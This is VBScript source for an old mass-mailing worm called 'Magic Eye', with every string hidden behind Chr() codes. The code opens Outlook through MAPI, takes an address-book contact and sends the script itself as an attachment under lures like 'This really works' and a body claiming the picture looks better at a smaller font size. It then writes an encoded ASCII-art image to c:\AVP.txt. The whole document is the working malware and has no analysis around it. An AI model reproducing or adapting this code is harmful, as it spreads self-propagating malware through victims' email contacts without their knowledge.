'Magic Eye By Yello 27/11/00  (Outlook &  mIRC)
OutL00k()
Sub OutL00k()
On Error Resume Next
Randomize
Nik = Int((4 * Rnd) + 1)
If Nik = 1 Then NikB = Chr(77) & Chr(97) & Chr(103) & Chr(105) & Chr(99) & Chr(32) & Chr(101) & Chr(121) & Chr(101)
If Nik = 2 Then NikB = Chr(84) & Chr(104) & Chr(105) & Chr(115) & Chr(32) & Chr(114) & Chr(101) & Chr(97) & Chr(108) & Chr(108) & Chr(121) & Chr(32) & Chr(119) & Chr(111) & Chr(114) & Chr(107) & Chr(115)
If Nik = 3 Then NikB = Chr(69) & Chr(121) & Chr(101) & Chr(32) & Chr(109) & Chr(97) & Chr(103) & Chr(105) & Chr(99)
If Nik = 4 Then NikB = Chr(71) & Chr(111) & Chr(111) & Chr(100) & Chr(32) & Chr(109) & Chr(97) & Chr(103) & Chr(105) & Chr(99) & Chr(32) & Chr(101) & Chr(121) & Chr(101)
Set Create = CreateObject(Chr(79) & Chr(117) & Chr(116) & Chr(108) & Chr(111) & Chr(111) & Chr(107) & Chr(46) & Chr(65) & Chr(112) & Chr(112) & Chr(108) & Chr(105) & Chr(99) & Chr(97) & Chr(116) & Chr(105) & Chr(111) & Chr(110))
Set Create1 = Create.GetNameSpace(Chr(77) & Chr(65) & Chr(80) & Chr(73))
Set ab = Create1.AddressLists(1/1)
Set Yelp = Create.CreateItem(00)
em = ab.AddressEntries (10 + 1 - 10)
Yelp.Recipients.Add em
Yelp.Attachments.Add WScript.ScriptFullName
Yelp.Subject = NikB
yelp.Body =  Chr(84) & Chr(104) & Chr(105) & Chr(115) & Chr(32) & Chr(105) & Chr(115) & Chr(32) & Chr(103) & Chr(111) & Chr(111) & Chr(100) & Chr(32) & Chr(33) & Chr(33) & Chr(33) & Chr(33) & Chr(13) & Chr(73) & Chr(102) & Chr(32) & Chr(121) & Chr(111) & Chr(117) & Chr(32) & Chr(108) & Chr(111) & Chr(119) & Chr(101) & Chr(114) & Chr(32) & Chr(116) & Chr(104) & Chr(101) & Chr(32) & Chr(102) & Chr(111) & Chr(110) & Chr(116) & Chr(32) & Chr(115) & Chr(105) & Chr(122) & Chr(101) & Chr(32) & Chr(105) & Chr(116) & Chr(32) & Chr(108) & Chr(111) & Chr(111) & Chr(107) & Chr(115) & Chr(32) & Chr(98) & Chr(101) & Chr(116) & Chr(116) & Chr(101) & Chr(114) & Chr(46)
Yelp.Send
Set Dump = CreateObject(Chr(83) & Chr(99) & Chr(114) & Chr(105) & Chr(112) & Chr(116) & Chr(105) & Chr(110) & Chr(103) & Chr(46) & Chr(70) & Chr(105) & Chr(108) & Chr(101) & Chr(83) & Chr(121) & Chr(115) & Chr(116) & Chr(101) & Chr(109) & Chr(79) & Chr(98) & Chr(106) & Chr(101) & Chr(99) & Chr(116))
Set vx = Dump.CreateTextFile(Chr(99) & Chr(58) & Chr(92) & Chr(65) & Chr(86) & Chr(80) & Chr(46) & Chr(116) & Chr(120) & Chr(116), True)
vx.writeline(String(29,Chr(32)) & Chr(46) & Chr(32) & Chr(46) & Chr(46) & Chr(46))
vx.writeline(String(25,Chr(32)) & Chr(46) & Chr(39) & Chr(39) & Chr(46) & Chr(39) & Chr(32) & Chr(46) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(39) & Chr(46))
vx.writeline(String(20,Chr(32)) & Chr(46) & Chr(32) & Chr(39) & Chr(39) & Chr(32) & Chr(34) & Chr(46) & Chr(39) & Chr(46) & Chr(58) & Chr(73) & Chr(58) & Chr(46) & Chr(39) & Chr(46) & Chr(46) & Chr(32) & Chr(32) & Chr(39) & Chr(46))
vx.writeline(String(18,Chr(32)) & Chr(46) & Chr(39) & Chr(46) & Chr(58) & Chr(46) & Chr(58) & Chr(46) & Chr(46) & Chr(44) & Chr(44) & Chr(58) & Chr(73) & Chr(73) & Chr(58) & Chr(39) & Chr(46) & Chr(39) & Chr(46) & Chr(39) & Chr(46) & Chr(46) & Chr(32) & Chr(39) & Chr(46))
vx.writeline(String(16,Chr(32))& Chr(46) & Chr(39) & Chr(58) & Chr(46) & Chr(39) & Chr(46) & Chr(58) & Chr(46) & Chr(58) & Chr(73) & Chr(58) & Chr(46) & Chr(58) & Chr(73) & Chr(73) & Chr(58) & Chr(39) & Chr(46) & Chr(39) & Chr(46) & Chr(39) & Chr(46) & Chr(39) & Chr(46) & Chr(46) & Chr(32) & Chr(39) & Chr(46))
vx.writeline(String(14,Chr(32)) & Chr(46) & Chr(39) & Chr(46) & Chr(39) & Chr(46) & Chr(39) & Chr(46) & Chr(39) & Chr(58) & Chr(58) & Chr(46) & Chr(58) & Chr(46) & Chr(58) & Chr(46) & Chr(58) & Chr(73) & Chr(58) & Chr(39) & Chr(46) & Chr(39) & Chr(46) & Chr(39) & Chr(46) & Chr(39) & Chr(46) & Chr(32) & Chr(46) & Chr(32) & Chr(32) & Chr(39))
vx.writeline(String(13,Chr(32)) & Chr(46) & Chr(46) & Chr(39) & Chr(46) & Chr(39) & Chr(46) & Chr(39) & Chr(46) & Chr(58) & Chr(46) & Chr(58) & Chr(73) & Chr(58) & Chr(58) & Chr(46) & Chr(58) & Chr(73) & Chr(73) & Chr(58) & Chr(46) & Chr(39) & Chr(46) & Chr(46) & Chr(39) & Chr(46) & Chr(39) & Chr(46) & Chr(46) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(46))
vx.writeline(Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(46) & Chr(46) & Chr(39) & Chr(46) & Chr(39) & Chr(39) & Chr(58) & Chr(46) & Chr(58) & Chr(46) & Chr(58) & Chr(58) & Chr(46) & Chr(58) & Chr(46) & Chr(58) & Chr(58) & Chr(73) & Chr(73) & Chr(58) & Chr(58) & Chr(46) & Chr(39) & Chr(46) & Chr(39) & Chr(46) & Chr(39) & Chr(46) & Chr(39) & Chr(46) & Chr(46) & Chr(32) & Chr(32) & Chr(32) & Chr(46))
vx.writeline(Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(46) & Chr(46) & Chr(39) & Chr(46) & Chr(39) & Chr(46) & Chr(39) & Chr(46) & Chr(58) & Chr(46) & Chr(58) & Chr(58) & Chr(46) & Chr(32) & Chr(46) & Chr(58) & Chr(58) & Chr(58) & Chr(73) & Chr(73) & Chr(58) & Chr(46) & Chr(46) & Chr(39) & Chr(46) & Chr(39) & Chr(46) & Chr(39) & Chr(46) & Chr(39) & Chr(46) & Chr(39) & Chr(46) & Chr(32) & Chr(32) & Chr(32) & Chr(46))
vx.writeline(Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(46) & Chr(39) & Chr(58) & Chr(46) & Chr(39) & Chr(39) & Chr(46) & Chr(39) & Chr(58) & Chr(39) & Chr(46) & Chr(39) & Chr(46) & Chr(39) & Chr(46) & Chr(58) & Chr(46) & Chr(58) & Chr(73) & Chr(58) & Chr(39) & Chr(46) & Chr(39) & Chr(46) & Chr(39) & Chr(46) & Chr(39) & Chr(46) & Chr(39) & Chr(46) & Chr(46) & Chr(32) & Chr(39) & Chr(46) & Chr(46) & Chr(32) & Chr(32) & Chr(46) & Chr(46))
vx.writeline(Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(39) & Chr(58) & Chr(46) & Chr(32) & Chr(39) & Chr(46) & Chr(39) & Chr(58) & Chr(39) & Chr(46) & Chr(32) & Chr(46) & Chr(46) & Chr(58) & Chr(46) & Chr(58) & Chr(58) & Chr(46) & Chr(58) & Chr(58) & Chr(46) & Chr(58) & Chr(46) & Chr(39) & Chr(46) & Chr(46) & Chr(39) & Chr(32) & Chr(32) & Chr(39) & Chr(58) & Chr(46) & Chr(39) & Chr(46) & Chr(39) & Chr(46) & Chr(46) & Chr(32) & Chr(46) & Chr(46))
vx.writeline(Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(46) & Chr(58) & Chr(46) & Chr(58) & Chr(46) & Chr(39) & Chr(58) & Chr(39) & Chr(46) & Chr(32) & Chr(32) & Chr(32) & Chr(39) & Chr(46) & Chr(58) & Chr(39) & Chr(58) & Chr(73) & Chr(58) & Chr(46) & Chr(58) & Chr(46) & Chr(46) & Chr(32) & Chr(46) & Chr(39) & Chr(46) & Chr(39) & Chr(46) & Chr(32) & Chr(32) & Chr(39) & Chr(58) & Chr(32) & Chr(46) & Chr(39) & Chr(46) & Chr(46) & Chr(32) & Chr(46) & Chr(32) & Chr(46) & Chr(46))
vx.writeline(Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(39) & Chr(46) & Chr(46) & Chr(58) & Chr(46) & Chr(58) & Chr(39) & Chr(46) & Chr(32) & Chr(32) & Chr(32) & Chr(46) & Chr(58) & Chr(46) & Chr(73) & Chr(73) & Chr(58) & Chr(46) & Chr(58) & Chr(46) & Chr(46) & Chr(32) & Chr(32) & Chr(32) & Chr(46) & Chr(32) & Chr(46) & Chr(58) & Chr(46) & Chr(39) & Chr(46) & Chr(32) & Chr(39) & Chr(46) & Chr(46) & Chr(32) & Chr(39) & Chr(46) & Chr(32) & Chr(46) & Chr(32) & Chr(32) & Chr(46) & Chr(46))
vx.writeline(Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(46) & Chr(46) & Chr(32) & Chr(58) & Chr(46) & Chr(58) & Chr(46) & Chr(39) & Chr(46) & Chr(32) & Chr(32) & Chr(46) & Chr(58) & Chr(46) & Chr(58) & Chr(73) & Chr(58) & Chr(46) & Chr(58) & Chr(46) & Chr(32) & Chr(46) & Chr(32) & Chr(32) & Chr(46) & Chr(32) & Chr(46) & Chr(46) & Chr(58) & Chr(46) & Chr(46) & Chr(58) & Chr(46) & Chr(32) & Chr(58) & Chr(46) & Chr(46) & Chr(39) & Chr(58) & Chr(46) & Chr(32) & Chr(46) & Chr(32) & Chr(32) & Chr(39) & Chr(46))
vx.writeline(Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(46) & Chr(58) & Chr(46) & Chr(32) & Chr(58) & Chr(46) & Chr(58) & Chr(46) & Chr(32) & Chr(32) & Chr(32) & Chr(46) & Chr(58) & Chr(46) & Chr(58) & Chr(73) & Chr(58) & Chr(46) & Chr(58) & Chr(46) & Chr(32) & Chr(46) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(46) & Chr(32) & Chr(46) & Chr(46) & Chr(58) & Chr(73) & Chr(58) & Chr(58) & Chr(46) & Chr(32) & Chr(58) & Chr(58) & Chr(32) & Chr(58) & Chr(58) & Chr(32) & Chr(32) & Chr(46) & Chr(46) & Chr(32) & Chr(46) & Chr(46))
vx.writeline(Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(46) & Chr(46) & Chr(32) & Chr(58) & Chr(39) & Chr(46) & Chr(39) & Chr(46) & Chr(58) & Chr(46) & Chr(32) & Chr(46) & Chr(58) & Chr(46) & Chr(58) & Chr(73) & Chr(58) & Chr(39) & Chr(46) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(46) & Chr(46) & Chr(58) & Chr(46) & Chr(58) & Chr(73) & Chr(58) & Chr(46) & Chr(32) & Chr(58) & Chr(58) & Chr(32) & Chr(58) & Chr(58) & Chr(46) & Chr(32) & Chr(32) & Chr(32) & Chr(46) & Chr(32) & Chr(39) & Chr(46))
vx.writeline(Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(39) & Chr(46) & Chr(46) & Chr(58) & Chr(46) & Chr(32) & Chr(46) & Chr(58) & Chr(46) & Chr(46) & Chr(32) & Chr(46) & Chr(58) & Chr(73) & Chr(73) & Chr(58) & Chr(39) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(44) & Chr(44) & Chr(59) & Chr(73) & Chr(73) & Chr(73) & Chr(72) & Chr(46) & Chr(32) & Chr(32) & Chr(58) & Chr(58) & Chr(46) & Chr(32) & Chr(39) & Chr(58) & Chr(46) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(46))
vx.writeline(Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(46) & Chr(58) & Chr(46) & Chr(58) & Chr(58) & Chr(39) & Chr(46) & Chr(58) & Chr(58) & Chr(58) & Chr(46) & Chr(46) & Chr(58) & Chr(46) & Chr(65) & Chr(73) & Chr(73) & Chr(59) & Chr(44) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(46) & Chr(58) & Chr(58) & Chr(34) & Chr(44) & Chr(44) & Chr(32) & Chr(32) & Chr(58) & Chr(73) & Chr(32) & Chr(46) & Chr(58) & Chr(58) & Chr(46) & Chr(32) & Chr(39) & Chr(58) & Chr(46) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(46))
vx.writeline(Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(58) & Chr(46) & Chr(46) & Chr(58) & Chr(39) & Chr(46) & Chr(58) & Chr(73) & Chr(73) & Chr(58) & Chr(46) & Chr(58) & Chr(73) & Chr(58) & Chr(32) & Chr(32) & Chr(44) & Chr(44) & Chr(59) & Chr(39) & Chr(32) & Chr(32) & Chr(32) & Chr(39) & Chr(32) & Chr(46) & Chr(59) & Chr(58) & Chr(70) & Chr(66) & Chr(84) & Chr(34) & Chr(88) & Chr(58) & Chr(58) & Chr(32) & Chr(46) & Chr(46) & Chr(58) & Chr(46) & Chr(46) & Chr(32) & Chr(39) & Chr(58) & Chr(46) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(46) & Chr(32) & Chr(46))
vx.writeline(Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(46) & Chr(46) & Chr(32) & Chr(58) & Chr(39) & Chr(58) & Chr(73) & Chr(73) & Chr(73) & Chr(58) & Chr(46) & Chr(32) & Chr(58) & Chr(46) & Chr(58) & Chr(65) & Chr(34) & Chr(80) & Chr(66) & Chr(102) & Chr(59) & Chr(46) & Chr(32) & Chr(32) & Chr(46) & Chr(32) & Chr(46) & Chr(102) & Chr(44) & Chr(49) & Chr(102) & Chr(59) & Chr(59) & Chr(34) & Chr(58) & Chr(58) & Chr(32) & Chr(58) & Chr(73) & Chr(58) & Chr(46) & Chr(46) & Chr(39) & Chr(58) & Chr(58) & Chr(46) & Chr(32) & Chr(46) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(46) & Chr(46))
vx.writeline(Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(46) & Chr(32) & Chr(46) & Chr(58) & Chr(46) & Chr(58) & Chr(73) & Chr(73) & Chr(58) & Chr(32) & Chr(65) & Chr(46) & Chr(39) & Chr(46) & Chr(39) & Chr(59) & Chr(44) & Chr(102) & Chr(102) & Chr(58) & Chr(34) & Chr(32) & Chr(46) & Chr(32) & Chr(32) & Chr(46) & Chr(32) & Chr(46) & Chr(46) & Chr(39) & Chr(46) & Chr(46) & Chr(39) & Chr(32) & Chr(46) & Chr(58) & Chr(32) & Chr(58) & Chr(46) & Chr(58) & Chr(58) & Chr(46) & Chr(32) & Chr(39) & Chr(58) & Chr(46) & Chr(46) & Chr(46) & Chr(32) & Chr(32) & Chr(46) & Chr(32) & Chr(46) & Chr(46))
vx.writeline(Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(46) & Chr(32) & Chr(46) & Chr(58) & Chr(32) & Chr(46) & Chr(58) & Chr(73) & Chr(73) & Chr(73) & Chr(72) & Chr(58) & Chr(46) & Chr(32) & Chr(32) & Chr(32) & Chr(39) & Chr(32) & Chr(39) & Chr(46) & Chr(39) & Chr(32) & Chr(46) & Chr(32) & Chr(32) & Chr(46) & Chr(46) & Chr(46) & Chr(32) & Chr(46) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(46) & Chr(58) & Chr(46) & Chr(32) & Chr(58) & Chr(46) & Chr(58) & Chr(46) & Chr(46) & Chr(32) & Chr(58) & Chr(46) & Chr(46) & Chr(46) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(46) & Chr(39))
vx.writeline(Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(46) & Chr(32) & Chr(46) & Chr(73) & Chr(46) & Chr(58) & Chr(58) & Chr(73) & Chr(58) & Chr(73) & Chr(73) & Chr(65) & Chr(46) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(46) & Chr(46) & Chr(32) & Chr(32) & Chr(32) & Chr(46) & Chr(46) & Chr(46) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(46) & Chr(46) & Chr(58) & Chr(58) & Chr(46) & Chr(39) & Chr(46) & Chr(39) & Chr(46) & Chr(39) & Chr(46) & Chr(58) & Chr(32) & Chr(46) & Chr(46) & Chr(32) & Chr(32) & Chr(46) & Chr(32) & Chr(46))
vx.writeline( Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(46) & Chr(58) & Chr(73) & Chr(73) & Chr(46) & Chr(39) & Chr(46) & Chr(39) & Chr(58) & Chr(73) & Chr(65) & Chr(58) & Chr(46) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(46) & Chr(46) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(46) & Chr(46) & Chr(58) & Chr(46) & Chr(32) & Chr(32) & Chr(46) & Chr(32) & Chr(46) & Chr(58) & Chr(46) & Chr(58) & Chr(32) & Chr(46) & Chr(39) & Chr(39) & Chr(46) & Chr(39) & Chr(32) & Chr(32) & Chr(46) & Chr(46) & Chr(32) & Chr(32) & Chr(46) & Chr(32) & Chr(46))
vx.writeline( Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(46) & Chr(46) & Chr(58) & Chr(58) & Chr(73) & Chr(58) & Chr(44) & Chr(39) & Chr(46) & Chr(39) & Chr(58) & Chr(58) & Chr(65) & Chr(58) & Chr(46) & Chr(32) & Chr(32) & Chr(46) & Chr(32) & Chr(46) & Chr(58) & Chr(39) & Chr(45) & Chr(44) & Chr(32) & Chr(46) & Chr(45) & Chr(46) & Chr(58) & Chr(46) & Chr(46) & Chr(32) & Chr(32) & Chr(46) & Chr(58) & Chr(46) & Chr(58) & Chr(58) & Chr(65) & Chr(65) & Chr(46) & Chr(46) & Chr(32) & Chr(46) & Chr(46) & Chr(58) & Chr(46) & Chr(39) & Chr(32) & Chr(46) & Chr(46) & Chr(32) & Chr(46))
vx.writeline(Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(39) & Chr(58) & Chr(73) & Chr(73) & Chr(58) & Chr(73) & Chr(58) & Chr(46) & Chr(32) & Chr(32) & Chr(39) & Chr(58) & Chr(65) & Chr(58) & Chr(46) & Chr(32) & Chr(46) & Chr(46) & Chr(58) & Chr(39) & Chr(32) & Chr(32) & Chr(32) & Chr(39) & Chr(39) & Chr(46) & Chr(46) & Chr(32) & Chr(46) & Chr(32) & Chr(58) & Chr(32) & Chr(46) & Chr(46) & Chr(58) & Chr(58) & Chr(58) & Chr(65) & Chr(72) & Chr(73) & Chr(58) & Chr(32) & Chr(46) & Chr(46) & Chr(58) & Chr(46) & Chr(46) & Chr(39) & Chr(46) & Chr(39) & Chr(46))
vx.writeline(Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(46) & Chr(39) & Chr(58) & Chr(73) & Chr(73) & Chr(73) & Chr(46) & Chr(58) & Chr(58) & Chr(46) & Chr(32) & Chr(32) & Chr(32) & Chr(39) & Chr(73) & Chr(73) & Chr(58) & Chr(46) & Chr(58) & Chr(46) & Chr(44) & Chr(44) & Chr(59) & Chr(59) & Chr(59) & Chr(58) & Chr(58) & Chr(58) & Chr(58) & Chr(58) & Chr(34) & Chr(46) & Chr(32) & Chr(46) & Chr(58) & Chr(58) & Chr(58) & Chr(65) & Chr(72) & Chr(86) & Chr(58) & Chr(58) & Chr(32) & Chr(46) & Chr(58) & Chr(58) & Chr(39) & Chr(39) & Chr(32) & Chr(46) & Chr(46))
vx.writeline(Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(46) & Chr(46) & Chr(34) & Chr(58) & Chr(73) & Chr(73) & Chr(72) & Chr(73) & Chr(58) & Chr(58) & Chr(46) & Chr(32) & Chr(46) & Chr(32) & Chr(32) & Chr(34) & Chr(73) & Chr(58) & Chr(46) & Chr(46) & Chr(34) & Chr(58) & Chr(59) & Chr(44) & Chr(44) & Chr(44) & Chr(44) & Chr(59) & Chr(59) & Chr(34) & Chr(46) & Chr(32) & Chr(46) & Chr(32) & Chr(46) & Chr(58) & Chr(65) & Chr(73) & Chr(73) & Chr(58) & Chr(58) & Chr(32) & Chr(58) & Chr(46) & Chr(58) & Chr(39) & Chr(32) & Chr(32) & Chr(46) & Chr(32) & Chr(46))
vx.writeline( Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(46) & Chr(32) & Chr(46) & Chr(32) & Chr(73) & Chr(73) & Chr(72) & Chr(72) & Chr(73) & Chr(58) & Chr(46) & Chr(46) & Chr(39) & Chr(46) & Chr(39) & Chr(46) & Chr(39) & Chr(86) & Chr(58) & Chr(58) & Chr(46) & Chr(32) & Chr(34) & Chr(34) & Chr(58) & Chr(59) & Chr(59) & Chr(59) & Chr(34) & Chr(34) & Chr(32) & Chr(32) & Chr(32) & Chr(46) & Chr(46) & Chr(46) & Chr(58) & Chr(65) & Chr(73) & Chr(73) & Chr(86) & Chr(58) & Chr(39) & Chr(46) & Chr(58) & Chr(46) & Chr(39) & Chr(32) & Chr(32) & Chr(46) & Chr(46) & Chr(32) & Chr(46))
vx.writeline(Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(46) & Chr(32) & Chr(46) & Chr(32) & Chr(58) & Chr(73) & Chr(73) & Chr(72) & Chr(73) & Chr(58) & Chr(46) & Chr(32) & Chr(46) & Chr(58) & Chr(46) & Chr(58) & Chr(46) & Chr(86) & Chr(58) & Chr(46) & Chr(32) & Chr(32) & Chr(32) & Chr(39) & Chr(32) & Chr(39) & Chr(32) & Chr(46) & Chr(32) & Chr(46) & Chr(46) & Chr(46) & Chr(58) & Chr(72) & Chr(73) & Chr(58) & Chr(39) & Chr(32) & Chr(46) & Chr(58) & Chr(58) & Chr(32) & Chr(58) & Chr(46) & Chr(32) & Chr(46) & Chr(32) & Chr(32) & Chr(46) & Chr(46))
vx.writeline(Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(46) & Chr(32) & Chr(46) & Chr(32) & Chr(32) & Chr(39) & Chr(58) & Chr(73) & Chr(72) & Chr(73) & Chr(73) & Chr(58) & Chr(58) & Chr(32) & Chr(58) & Chr(58) & Chr(46) & Chr(73) & Chr(65) & Chr(46) & Chr(46) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(46) & Chr(46) & Chr(32) & Chr(46) & Chr(65) & Chr(32) & Chr(46) & Chr(44) & Chr(44) & Chr(58) & Chr(58) & Chr(58) & Chr(39) & Chr(32) & Chr(46) & Chr(58) & Chr(46) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(46))
vx.writeline(Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(58) & Chr(46) & Chr(32) & Chr(32) & Chr(46) & Chr(46) & Chr(46) & Chr(39) & Chr(73) & Chr(58) & Chr(73) & Chr(58) & Chr(46) & Chr(58) & Chr(32) & Chr(46) & Chr(44) & Chr(65) & Chr(72) & Chr(72) & Chr(65) & Chr(44) & Chr(32) & Chr(46) & Chr(32) & Chr(46) & Chr(39) & Chr(46) & Chr(46) & Chr(65) & Chr(72) & Chr(73) & Chr(86) & Chr(58) & Chr(58) & Chr(39) & Chr(32) & Chr(46) & Chr(32) & Chr(46) & Chr(32) & Chr(32) & Chr(58) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(46) & Chr(46))
vx.writeline(Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(58) & Chr(46) & Chr(32) & Chr(39) & Chr(46) & Chr(58) & Chr(58) & Chr(58) & Chr(58) & Chr(73) & Chr(73) & Chr(58) & Chr(46) & Chr(73) & Chr(58) & Chr(46) & Chr(72) & Chr(73) & Chr(72) & Chr(72) & Chr(73) & Chr(72) & Chr(72) & Chr(72) & Chr(72) & Chr(72) & Chr(73) & Chr(72) & Chr(72) & Chr(73) & Chr(72) & Chr(86) & Chr(58) & Chr(39) & Chr(46) & Chr(46) & Chr(58) & Chr(46) & Chr(32) & Chr(46) & Chr(73) & Chr(46) & Chr(39) & Chr(58) & Chr(46) & Chr(32) & Chr(46) & Chr(46) & Chr(32) & Chr(32) & Chr(39) & Chr(46))
vx.writeline(Chr(32) & Chr(32) & Chr(32) & Chr(46) & Chr(32) & Chr(46) & Chr(32) & Chr(46) & Chr(46) & Chr(32) & Chr(39) & Chr(39) & Chr(58) & Chr(58) & Chr(58) & Chr(73) & Chr(58) & Chr(39) & Chr(46) & Chr(58) & Chr(58) & Chr(73) & Chr(72) & Chr(72) & Chr(72) & Chr(72) & Chr(72) & Chr(72) & Chr(72) & Chr(72) & Chr(77) & Chr(72) & Chr(77) & Chr(72) & Chr(73) & Chr(72) & Chr(73) & Chr(46) & Chr(32) & Chr(39) & Chr(46) & Chr(39) & Chr(46) & Chr(58) & Chr(73) & Chr(72) & Chr(73) & Chr(46) & Chr(46) & Chr(32) & Chr(32) & Chr(39) & Chr(32) & Chr(32) & Chr(39) & Chr(32) & Chr(32) & Chr(39) & Chr(46))
vx.writeline(Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(39) & Chr(58) & Chr(46) & Chr(46) & Chr(46) & Chr(32) & Chr(46) & Chr(32) & Chr(32) & Chr(39) & Chr(39) & Chr(34) & Chr(32) & Chr(46) & Chr(58) & Chr(58) & Chr(39) & Chr(46) & Chr(72) & Chr(77) & Chr(72) & Chr(73) & Chr(58) & Chr(72) & Chr(72) & Chr(89) & Chr(69) & Chr(76) & Chr(76) & Chr(79) & Chr(73) & Chr(72) & Chr(73) & Chr(46) & Chr(32) & Chr(58) & Chr(73) & Chr(73) & Chr(72) & Chr(72) & Chr(73) & Chr(73) & Chr(58) & Chr(46) & Chr(32) & Chr(46) & Chr(32) & Chr(46) & Chr(32) & Chr(46) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(46))
vx.writeline( Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(58) & Chr(46) & Chr(58) & Chr(46) & Chr(46) & Chr(32) & Chr(46) & Chr(32) & Chr(46) & Chr(46) & Chr(58) & Chr(58) & Chr(46) & Chr(39) & Chr(32) & Chr(46) & Chr(73) & Chr(86) & Chr(34) & Chr(46) & Chr(58) & Chr(73) & Chr(58) & Chr(73) & Chr(73) & Chr(73) & Chr(72) & Chr(73) & Chr(72) & Chr(72) & Chr(73) & Chr(72) & Chr(46) & Chr(32) & Chr(46) & Chr(58) & Chr(73) & Chr(72) & Chr(73) & Chr(58) & Chr(58) & Chr(39) & Chr(46) & Chr(39) & Chr(58) & Chr(32) & Chr(39) & Chr(46) & Chr(46) & Chr(32) & Chr(32) & Chr(46) & Chr(32) & Chr(32) & Chr(46))
vx.writeline(Chr(32) & Chr(32) & Chr(32) & Chr(46) & Chr(32) & Chr(46) & Chr(58) & Chr(46) & Chr(58) & Chr(58) & Chr(32) & Chr(46) & Chr(46) & Chr(32) & Chr(58) & Chr(58) & Chr(39) & Chr(46) & Chr(39) & Chr(46) & Chr(39) & Chr(46) & Chr(46) & Chr(39) & Chr(58) & Chr(46) & Chr(58) & Chr(58) & Chr(73) & Chr(58) & Chr(73) & Chr(58) & Chr(73) & Chr(72) & Chr(72) & Chr(72) & Chr(73) & Chr(65) & Chr(46) & Chr(39) & Chr(46) & Chr(73) & Chr(73) & Chr(46) & Chr(58) & Chr(46) & Chr(46) & Chr(46) & Chr(58) & Chr(39) & Chr(32) & Chr(46) & Chr(39) & Chr(32) & Chr(46) & Chr(46) & Chr(46) & Chr(32) & Chr(46) & Chr(32) & Chr(39) & Chr(46) & Chr(46))
